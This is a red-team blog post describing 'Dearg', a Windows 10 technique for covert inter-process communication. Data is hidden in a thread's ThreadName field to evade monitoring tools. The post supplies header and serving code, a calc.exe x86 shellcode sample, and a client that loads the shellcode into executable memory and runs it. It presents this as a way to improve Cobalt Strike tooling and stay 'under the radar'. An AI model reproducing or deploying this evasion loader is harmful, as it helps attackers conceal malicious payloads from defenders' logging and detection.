Stealthy Process Communication Between Threads on Windows 10
Stealthy Process Communication Between Threads on Windows 10
Introduction
Whilst playing with a Cobalt Strike beacon, I was thinking of ways that the artefact kit could be improved on in terms of IPC ("Inter-Process Communication"). The de facto standard is usually to use named pipes, usually as a way to read shellcode from inside a process we've injected into.
The new communication method won't be observable by existing tools - the unusual IPC channel used will evade logging and audit/alarm based triggers.
Standard tooling won't be able to pick up the transactions between the threads, much like ProcMon (and like) would be able to do on traditional Windows file operations. By choosing a rarely used feature to abuse as a custom IPC channel, for the purpose, tools would be needed to enable the normal volume and granularity of IPC data.
All we need to utilise this method is a HANDLE
to the thread, with THREAD_QUERY_LIMITED_INFORMATION
permissions. This flag also works on protected processes, as THREAD_QUERY_INFORMATION
does not.
I've called this project Dearg, which means red in Gaelic, a GitHub project exists here with all of the code for the project. How the client speaks to a serving thread is briefly outlined below:
Technique
The technique relies on the fact that we can modify the ThreadName
member within the ETHREAD
structure. The ETHREAD
structure contains information about a thread and is stored in kernel space. We can fetch information about a thread using the NtQueryInformationThread
system call, or the friendlier user-mode API GetThreadInformation
, and subsequently set information about a thread using NtSetInformationThread
, and SetInformationThread
. I've attempted to make this technique follow the model of client <-> server as much as possible, where the client is fetching whatever buffer from another thread, and the server hosting it.
Using the handy ntdiff, we can see the difference between the ETHREAD
structure in the last release of Windows 7, and Windows 10 1607, in ntoskrnl.exe
. ThreadName
does not exist, this technique can only be applied to Windows 10 1607 (which was released in 2016), and above.
/* 0x07c8 */ struct _UNICODE_STRING* ThreadName;
This member is stored as a UNICODE_STRING
object, the standard Windows structure for a Unicode string. We're going to overwrite the Buffer
field, the actual string, with our data we want to communicate to another thread. As above-mentioned, this can be trivially accessed using standard APIs.
To access this field, at a minimum, we need one of the below permissions when getting a HANDLE
to the target thread. We'll take the "principle of least privilege" model - and opt for the lowest permission we can get away with, which is THREAD_QUERY_LIMITED_INFORMATION
. It's noteworthy that THREAD_QUERY_INFORMATION
won't work on protected processes, however the limited information class will.
THREAD_QUERY_INFORMATION (0x0040) Required to read certain information from the thread object, such as the exit code (see GetExitCodeThread).
THREAD_QUERY_LIMITED_INFORMATION (0x0800) Required to read certain information from the thread objects (see GetProcessIdOfThread). A handle that has the THREAD_QUERY_INFORMATION access right is automatically granted THREAD_QUERY_LIMITED_INFORMATION. Windows Server 2003 and Windows XP: This access right is not supported.
As this is a UNICODE_STRING
buffer, by design, the buffer's actual size is calculated by looking at the length of the string. In order for the data to be present within this buffer, and for the entire buffer to be returned when we make a fetch call to it, we need to ensure that it doesn't contain a null-terminator (0x00 0x00
). In an attempt to circumvent this, we'll encode the data with a simple 1-byte XOR key until the null terminator does not exist within the buffer. To find this key, we'll just keep incrementally encoding until we've got a sane buffer - we unfortunately won't be able to serve the data to the client if we can't eliminate the bytes.
Initially, I didn't have a simple permission model setup for this trivial protocol. However, I've defined the server as telling the client if the data is writeable/readable. The client must respect the header's permissions, as this isn't implemented at a lower abstraction level (i.e. the Windows I/O permission model).
We'll store this key in a packed header, along with magic at the start (so we can derive it from other threads), the length of the stored buffer, the data's permissions, and a CRC32 checksum to ensure data integrity.
#define DEARG_HEADER_MAGIC 0x1337BEEF
typedef enum DEARG_FLAGS {
DEARG_WRITE = 1,
DEARG_READ = 2,
DEARG_READWRITE = 3
} DEARG_FLAGS;
#pragma pack(push, 1)
typedef struct DEARG_HEADER {
DWORD32 dwMagic;
DEARG_FLAGS dfFlags;
DWORD32 dwChecksum;
UINT16 u16Len;
BYTE bKey;
} DEARG_HEADER, *PDEARG_HEADER;
#pragma pack(pop)
I found in tests the maximum buffer we could store in the Buffer
structure was around USHRT_MAX
- , likely a hard limit imposed under the hood in the kernel. So, the maximum amount we can store in this buffer is around USHRT_MAX - sizeof(UNICODE_STRING) - sizeof(DEARG_HEADER)
. So, we need to do the following to construct our payload:
- Set the magic to our
HEADER_MAGIC
value. - Calculate the CRC32 hash of the data, set our
dwChecksum
header member. - If the buffer contains the string terminator, loop from 0x0 to 0xFF trying to find a key that encodes our data to ensure the terminator doesn't exist. Leave this value at 0 if we don't need to encode.
- Construct the buffer, write the header, then write the encoded buffer.
To make this process easier, I've pushed a helper wrapper to GitHub here. You can plug this into your code at will. Other methodologies outlined below are included in the repository too!
Server
Our "server" will host the data, in a way which is described above. You can choose the main thread, or any other thread, to host the payload in ThreadName
. For example, we can go ahead and host the data in the current thread. In this instance, we're going to host a simple bit of x86 shellcode which executes calc.exe
:
int main(int argc, char** argv)
{
BYTE bShellcode[] = \
"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0";
// initialise the header
DEARG_HEADER dHdr;
if (!dearg_init_hdr(&dHdr))
{
return 0;
}
// attempt to serve the shellcode
DEARG_STATUS dStatus = dearg_serve(GetCurrentThread(), DEARG_READ | DEARG_WRITE, &dHdr, bShellcode, sizeof(bShellcode));
if (dStatus != DSERVE_OK)
{
switch (dStatus)
{
case DSERVE_ERROR_KEY:
puts("failed to find a suitable key");
break;
case DSERVE_ERROR_SET:
puts("failed to set the thread name");
break;
case DSERVE_ERROR_ALLOC:
puts("a memory allocation failure occured");
break;
case DSERVE_INVALID_PARAMS:
puts("the parameters were invalid");
break;
}
return 0;
}
printf("Serving %d bytes of content on thread ID %d using key 0x%X\n", sizeof(bShellcode), GetCurrentThreadId(), dHdr.Key);
return 1;
}
Using the tname_init_hdr
method will construct the header for us. The dearg_serve
method sets up the header for us, finds an appropriate key to encode (if needed), and sets the ThreadName
.
Client
As the client, we somehow need to find the thread which is our server in this case. We can differentiate the read that is hosting the data by reading the ThreadName
, and checking for our magic 0x1337BEEF
. After we've read the header, if we need write access, we need to re-open the handle with THREAD_SET_INFORMATION
. Next, we read the length of the data in the u16Len
member. After this, we read the data which is placed after the header and place it into a buffer. We then get a hash of the data, and compare it against the hash in the header - this ensures that the data we're reading has gone untampered.
The way in which you find the thread is totally up to the implementation, you could walk all the threads on the system, or pass the thread ID some other way. In the example below, we read shellcode from a thread with an ID of 1337, and execute the shellcode it is serving.
HANDLE hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, 1337);
if (hThread == INVALID_HANDLE_VALUE)
{
return FALSE;
}
DEARG_HEADER dHdr;
RtlSecureZeroMemory(&dHdr, sizeof(DEARG_HEADER));
// first, get the buffer size by heading the header
if (dearg_read(hThread, &dHdr, NULL, 0) != DSERVE_NO_DATA_OUT)
{
return FALSE;
}
// allocate the executable memory with the size from the header
LPVOID lpMem = VirtualAlloc(NULL, dHdr.u16Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (lpMem == NULL)
{
return FALSE;
}
// read in the data
if (dearg_read(hThread, &dHdr, lpMem) != DSERVE_OK)
{
return FALSE;
}
// execute the shellcode
((VOID(*)())lpMem)();
Conclusion
This method of communicating between processes could serve extremely useful if wanting to communicate between process under the radar. If anyone has any additions to this, feel free to get in touch with me, preferably via email: me@syscall.party.
Limitations
The structure member within ETHREAD
that we're weaponising to communicate, ThreadName
, only exists on Windows 10 1607 and higher.
Without the THREAD_QUERY_LIMITED_INFORMATION
access for the target thread handle, you won't be able to fetch the ETHREAD
member.
There is no sort of exclusive lock implemented, unlike actual file objects on Windows.
We can have a maximum shellcode buffer size of around USHRT_MAX - sizeof(UNICODE_STRING) - sizeof(DEARG_HEADER)
We need to ensure that a null terminator, \x00\x00
, within the main body of UNICODE_STRING::Buffer
does not exist. The wrapper attempts to find a key which satisfies this requirement.